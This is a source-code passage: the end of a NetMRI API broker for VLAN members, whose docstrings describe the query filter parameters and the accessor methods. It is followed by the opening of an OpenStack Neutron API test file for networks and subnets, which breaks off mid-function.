:param val_f_StpHoldTime: If op_StpHoldTime is specified, the field named in this input will be compared to the value in StpHoldTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpHoldTime must be specified if op_StpHoldTime is specified.
:type val_f_StpHoldTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpHoldTime: If op_StpHoldTime is specified, this value will be compared to the value in StpHoldTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpHoldTime must be specified if op_StpHoldTime is specified.
:type val_c_StpHoldTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpMaxAge: The operator to apply to the field StpMaxAge. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpMaxAge: The maximum age of Spanning Tree Protocol information learned from the network on any port before it is discarded, in units of hundredths of a second. This is the actual value that this bridge is currently using. Empty for non-bridge members. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_StpMaxAge: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpMaxAge: If op_StpMaxAge is specified, the field named in this input will be compared to the value in StpMaxAge using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpMaxAge must be specified if op_StpMaxAge is specified.
:type val_f_StpMaxAge: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpMaxAge: If op_StpMaxAge is specified, this value will be compared to the value in StpMaxAge using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpMaxAge must be specified if op_StpMaxAge is specified.
:type val_c_StpMaxAge: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpPriority: The operator to apply to the field StpPriority. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpPriority: The spanning tree protocol priority for this bridge in this VLAN. Empty for non-bridge members. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_StpPriority: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpPriority: If op_StpPriority is specified, the field named in this input will be compared to the value in StpPriority using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpPriority must be specified if op_StpPriority is specified.
:type val_f_StpPriority: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpPriority: If op_StpPriority is specified, this value will be compared to the value in StpPriority using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpPriority must be specified if op_StpPriority is specified.
:type val_c_StpPriority: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpProtocolSpecification: The operator to apply to the field StpProtocolSpecification. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpProtocolSpecification: The protocol of spanning tree running for this VLAN. Empty for non-bridge members. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_StpProtocolSpecification: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpProtocolSpecification: If op_StpProtocolSpecification is specified, the field named in this input will be compared to the value in StpProtocolSpecification using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpProtocolSpecification must be specified if op_StpProtocolSpecification is specified.
:type val_f_StpProtocolSpecification: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpProtocolSpecification: If op_StpProtocolSpecification is specified, this value will be compared to the value in StpProtocolSpecification using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpProtocolSpecification must be specified if op_StpProtocolSpecification is specified.
:type val_c_StpProtocolSpecification: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpRootCost: The operator to apply to the field StpRootCost. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpRootCost: The cost of the path to the root bridge as seen from this bridge. Empty for non-bridge members. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_StpRootCost: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpRootCost: If op_StpRootCost is specified, the field named in this input will be compared to the value in StpRootCost using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpRootCost must be specified if op_StpRootCost is specified.
:type val_f_StpRootCost: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpRootCost: If op_StpRootCost is specified, this value will be compared to the value in StpRootCost using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpRootCost must be specified if op_StpRootCost is specified.
:type val_c_StpRootCost: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpRootPort: The operator to apply to the field StpRootPort. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpRootPort: The port number (i.e., the SwitchPortNumber attribute value of the interface) of the port that offers the lowest cost path from this bridge to the root bridge. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_StpRootPort: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpRootPort: If op_StpRootPort is specified, the field named in this input will be compared to the value in StpRootPort using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpRootPort must be specified if op_StpRootPort is specified.
:type val_f_StpRootPort: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpRootPort: If op_StpRootPort is specified, this value will be compared to the value in StpRootPort using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpRootPort must be specified if op_StpRootPort is specified.
:type val_c_StpRootPort: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpTopChanges: The operator to apply to the field StpTopChanges. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpTopChanges: The total number of topology changes detected by this bridge since the last reset. Empty for non-bridge members. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_StpTopChanges: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpTopChanges: If op_StpTopChanges is specified, the field named in this input will be compared to the value in StpTopChanges using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpTopChanges must be specified if op_StpTopChanges is specified.
:type val_f_StpTopChanges: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpTopChanges: If op_StpTopChanges is specified, this value will be compared to the value in StpTopChanges using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpTopChanges must be specified if op_StpTopChanges is specified.
:type val_c_StpTopChanges: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VTPDomain: The operator to apply to the field VTPDomain. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VTPDomain: Management domain name if VLAN is VTP managed. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_VTPDomain: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VTPDomain: If op_VTPDomain is specified, the field named in this input will be compared to the value in VTPDomain using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VTPDomain must be specified if op_VTPDomain is specified.
:type val_f_VTPDomain: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VTPDomain: If op_VTPDomain is specified, this value will be compared to the value in VTPDomain using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VTPDomain must be specified if op_VTPDomain is specified.
:type val_c_VTPDomain: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanID: The operator to apply to the field VlanID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanID: The internal NetMRI identifier of the VLAN associated with this VLAN membership. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_VlanID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanID: If op_VlanID is specified, the field named in this input will be compared to the value in VlanID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanID must be specified if op_VlanID is specified.
:type val_f_VlanID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanID: If op_VlanID is specified, this value will be compared to the value in VlanID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanID must be specified if op_VlanID is specified.
:type val_c_VlanID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanMemberChangedCols: The operator to apply to the field VlanMemberChangedCols. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanMemberChangedCols: The fields that changed between this revision of the record and the previous revision. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_VlanMemberChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanMemberChangedCols: If op_VlanMemberChangedCols is specified, the field named in this input will be compared to the value in VlanMemberChangedCols using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanMemberChangedCols must be specified if op_VlanMemberChangedCols is specified.
:type val_f_VlanMemberChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanMemberChangedCols: If op_VlanMemberChangedCols is specified, this value will be compared to the value in VlanMemberChangedCols using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanMemberChangedCols must be specified if op_VlanMemberChangedCols is specified.
:type val_c_VlanMemberChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanMemberEndTime: The operator to apply to the field VlanMemberEndTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanMemberEndTime: The ending effective time of this revision of this record, or empty if still in effect. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_VlanMemberEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanMemberEndTime: If op_VlanMemberEndTime is specified, the field named in this input will be compared to the value in VlanMemberEndTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanMemberEndTime must be specified if op_VlanMemberEndTime is specified.
:type val_f_VlanMemberEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanMemberEndTime: If op_VlanMemberEndTime is specified, this value will be compared to the value in VlanMemberEndTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanMemberEndTime must be specified if op_VlanMemberEndTime is specified.
:type val_c_VlanMemberEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanMemberID: The operator to apply to the field VlanMemberID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanMemberID: The internal NetMRI identifier for this VLAN membership. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_VlanMemberID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanMemberID: If op_VlanMemberID is specified, the field named in this input will be compared to the value in VlanMemberID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanMemberID must be specified if op_VlanMemberID is specified.
:type val_f_VlanMemberID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanMemberID: If op_VlanMemberID is specified, this value will be compared to the value in VlanMemberID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanMemberID must be specified if op_VlanMemberID is specified.
:type val_c_VlanMemberID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanMemberStartTime: The operator to apply to the field VlanMemberStartTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanMemberStartTime: The starting effective time of this revision of the record. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_VlanMemberStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanMemberStartTime: If op_VlanMemberStartTime is specified, the field named in this input will be compared to the value in VlanMemberStartTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanMemberStartTime must be specified if op_VlanMemberStartTime is specified.
:type val_f_VlanMemberStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanMemberStartTime: If op_VlanMemberStartTime is specified, this value will be compared to the value in VlanMemberStartTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanMemberStartTime must be specified if op_VlanMemberStartTime is specified.
:type val_c_VlanMemberStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanMemberTimestamp: The operator to apply to the field VlanMemberTimestamp. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanMemberTimestamp: The date and time this record was collected or calculated. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_VlanMemberTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanMemberTimestamp: If op_VlanMemberTimestamp is specified, the field named in this input will be compared to the value in VlanMemberTimestamp using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanMemberTimestamp must be specified if op_VlanMemberTimestamp is specified.
:type val_f_VlanMemberTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanMemberTimestamp: If op_VlanMemberTimestamp is specified, this value will be compared to the value in VlanMemberTimestamp using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanMemberTimestamp must be specified if op_VlanMemberTimestamp is specified.
:type val_c_VlanMemberTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanName: The operator to apply to the field VlanName. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanName: The name of this VLAN as configured on this device. Empty for non-bridge members. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_VlanName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanName: If op_VlanName is specified, the field named in this input will be compared to the value in VlanName using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanName must be specified if op_VlanName is specified.
:type val_f_VlanName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanName: If op_VlanName is specified, this value will be compared to the value in VlanName using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanName must be specified if op_VlanName is specified.
:type val_c_VlanName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanState: The operator to apply to the field VlanState. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanState: The state of this VLAN on this device. Empty for non-bridge members.
The state 'mtuTooBigForDevice' indicates that this device cannot participate in this VLAN because the VLAN's MTU is larger than the device can support.
The state 'mtuTooBigForTrunk' indicates that while this VLAN's MTU is supported by this device, it is too large for one or more of the device's trunk ports. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_VlanState: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanState: If op_VlanState is specified, the field named in this input will be compared to the value in VlanState using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanState must be specified if op_VlanState is specified.
:type val_f_VlanState: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanState: If op_VlanState is specified, this value will be compared to the value in VlanState using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanState must be specified if op_VlanState is specified.
:type val_c_VlanState: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanType: The operator to apply to the field VlanType. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanType: The type of this VLAN (1:ethernet, 2:fddi, 3:tokenRing, 4:fddiNet, 5:trNet, 6:deprecated) as configured on this device. Empty for non-bridge members. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_VlanType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanType: If op_VlanType is specified, the field named in this input will be compared to the value in VlanType using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanType must be specified if op_VlanType is specified.
:type val_f_VlanType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanType: If op_VlanType is specified, this value will be compared to the value in VlanType using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanType must be specified if op_VlanType is specified.
:type val_c_VlanType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_network_id: The operator to apply to the field network_id. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. network_id: The Network View ID assigned to the Vlan membership. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_network_id: If op_network_id is specified, the field named in this input will be compared to the value in network_id using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_network_id must be specified if op_network_id is specified.
:type val_f_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_network_id: If op_network_id is specified, this value will be compared to the value in network_id using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_network_id must be specified if op_network_id is specified.
:type val_c_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the vlan members as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of vlan member methods. The listed methods will be called on each vlan member returned, and their results will be included in the output. Available methods are: network_id, data_source, device, interface, vlan.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device, interface, vlan.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. This record will always be returned, although it may not be the first record in the page. See the :limit parameter for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit is used to break the data into pages; the page beginning with the start record is returned. For example, with 100 records, a :limit of 10 and a :start of 10 returns records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` VlanMemberID
:param sort: The data field(s) to use for sorting the output. Default is VlanMemberID. Valid values are VlanMemberID, VlanMemberStartTime, VlanMemberEndTime, VlanMemberChangedCols, VlanMemberTimestamp, DataSourceID, DeviceID, VlanID, InterfaceID, BridgeMemberInd, VlanState, VlanType, VlanName, VTPDomain, RootBridgeAddress, BaseBridgeAddress, BaseNumPorts, StpDesignatedRoot, StpProtocolSpecification, StpPriority, StpTopChanges, StpRootCost, StpRootPort, StpMaxAge, StpHelloTime, StpHoldTime, StpForwardDelay, StpBridgeMaxAge, StpBridgeHelloTime, StpBridgeForwardDelay.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each VlanMember. Valid values are VlanMemberID, VlanMemberStartTime, VlanMemberEndTime, VlanMemberChangedCols, VlanMemberTimestamp, DataSourceID, DeviceID, VlanID, InterfaceID, BridgeMemberInd, VlanState, VlanType, VlanName, VTPDomain, RootBridgeAddress, BaseBridgeAddress, BaseNumPorts, StpDesignatedRoot, StpProtocolSpecification, StpPriority, StpTopChanges, StpRootCost, StpRootPort, StpMaxAge, StpHelloTime, StpHoldTime, StpForwardDelay, StpBridgeMaxAge, StpBridgeHelloTime, StpBridgeForwardDelay. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NetworkID: The network id to which results would be limited.
:type NetworkID: Integer
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Note that this kind of filter may be costly and inefficient if it is not combined with database-level filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return vlan_members: An array of the VlanMember objects that match the specified input criteria.
:rtype vlan_members: Array of VlanMember
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
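# A minimal usage sketch (illustrative only; the `broker` object below is
# hypothetical and not defined in this module): page through VLAN members
# 1000 at a time, sorted ascending by VlanMemberID.
# page = broker.find(start=0, limit=1000, sort=['VlanMemberID'], dir=['asc'], select=['VlanMemberID', 'DeviceID', 'VlanID'])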
def data_source(self, **kwargs):
"""The NetMRI device that collected this record.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The NetMRI device that collected this record.
:rtype : DataSource
"""
return self.api_request(self._get_method_fullname("data_source"), kwargs)
def interface(self, **kwargs):
"""The switched virtual interface for this VLAN on this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The switched virtual interface for this VLAN on this device.
:rtype : Interface
"""
return self.api_request(self._get_method_fullname("interface"), kwargs)
def vlan(self, **kwargs):
"""The VLAN associated with this VLAN membership.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The VLAN associated with this VLAN membership.
:rtype : Vlan
"""
return self.api_request(self._get_method_fullname("vlan"), kwargs)
def infradevice(self, **kwargs):
"""The device associated with this VLAN membership.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The device associated with this VLAN membership.
:rtype : InfraDevice
"""
return self.api_request(self._get_method_fullname("infradevice"), kwargs)
def network_id(self, **kwargs):
"""The Network View ID assigned to the Vlan membership.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The Network View ID assigned to the Vlan membership.
:rtype : Integer
"""
return self.api_request(self._get_method_fullname("network_id"), kwargs)
def device(self, **kwargs):
"""The device associated with this VLAN membership.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The device associated with this VLAN membership.
:rtype : Device
"""
return self.api_request(self._get_method_fullname("device"), kwargs)
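# A minimal usage sketch (the `broker` variable is hypothetical): each
# accessor above resolves one association for an existing record, keyed by
# its VlanMemberID, e.g.
# member_vlan = broker.vlan(VlanMemberID=42)
# member_device = broker.device(VlanMemberID=42)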
| apache-2.0 |
dhanunjaya/neutron | neutron/tests/api/test_networks.py | 28 | 29625 | # Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
import netaddr
import six
from tempest_lib.common.utils import data_utils
from tempest_lib import exceptions as lib_exc
from neutron.tests.api import base
from neutron.tests.tempest.common import custom_matchers
from neutron.tests.tempest import config
from neutron.tests.tempest import test
CONF = config.CONF
class NetworksTestJSON(base.BaseNetworkTest):
"""
Tests the following operations in the Neutron API using the REST client for
Neutron:
create a network for a tenant
list tenant's networks
show a tenant network details
create a subnet for a tenant
list tenant's subnets
show a tenant subnet details
network update
subnet update
delete a network also deletes its subnets
list external networks
All subnet tests are run once with ipv4 and once with ipv6.
v2.0 of the Neutron API is assumed. It is also assumed that the following
options are defined in the [network] section of etc/tempest.conf:
tenant_network_cidr with a block of cidr's from which smaller blocks
can be allocated for tenant ipv4 subnets
tenant_network_v6_cidr is the equivalent for ipv6 subnets
tenant_network_mask_bits with the mask bits to be used to partition the
block defined by tenant_network_cidr
tenant_network_v6_mask_bits is the equivalent for ipv6 subnets
"""
@classmethod
def resource_setup(cls):
super(NetworksTestJSON, cls).resource_setup()
cls.network = cls.create_network()
cls.name = cls.network['name']
cls.subnet = cls._create_subnet_with_last_subnet_block(cls.network,
cls._ip_version)
cls.cidr = cls.subnet['cidr']
cls._subnet_data = {6: {'gateway':
str(cls._get_gateway_from_tempest_conf(6)),
'allocation_pools':
cls._get_allocation_pools_from_gateway(6),
'dns_nameservers': ['2001:4860:4860::8844',
'2001:4860:4860::8888'],
'host_routes': [{'destination': '2001::/64',
'nexthop': '2003::1'}],
'new_host_routes': [{'destination':
'2001::/64',
'nexthop': '2005::1'}],
'new_dns_nameservers':
['2001:4860:4860::7744',
'2001:4860:4860::7888']},
4: {'gateway':
str(cls._get_gateway_from_tempest_conf(4)),
'allocation_pools':
cls._get_allocation_pools_from_gateway(4),
'dns_nameservers': ['8.8.4.4', '8.8.8.8'],
'host_routes': [{'destination': '10.20.0.0/32',
'nexthop': '10.100.1.1'}],
'new_host_routes': [{'destination':
'10.20.0.0/32',
'nexthop':
'10.100.1.2'}],
'new_dns_nameservers': ['7.8.8.8', '7.8.4.4']}}
@classmethod
def _create_subnet_with_last_subnet_block(cls, network, ip_version):
"""Derive last subnet CIDR block from tenant CIDR and
create the subnet with that derived CIDR
"""
if ip_version == 4:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
mask_bits = CONF.network.tenant_network_mask_bits
elif ip_version == 6:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
mask_bits = CONF.network.tenant_network_v6_mask_bits
subnet_cidr = list(cidr.subnet(mask_bits))[-1]
gateway_ip = str(netaddr.IPAddress(subnet_cidr) + 1)
return cls.create_subnet(network, gateway=gateway_ip,
cidr=subnet_cidr, mask_bits=mask_bits)
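# Worked example (values hypothetical): with tenant_network_cidr =
# 10.100.0.0/16 and tenant_network_mask_bits = 24, the last /24 block is
# 10.100.255.0/24, so the subnet is created with gateway 10.100.255.1
# (the network address plus one).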
@classmethod
def _get_gateway_from_tempest_conf(cls, ip_version):
"""Return first subnet gateway for configured CIDR """
if ip_version == 4:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
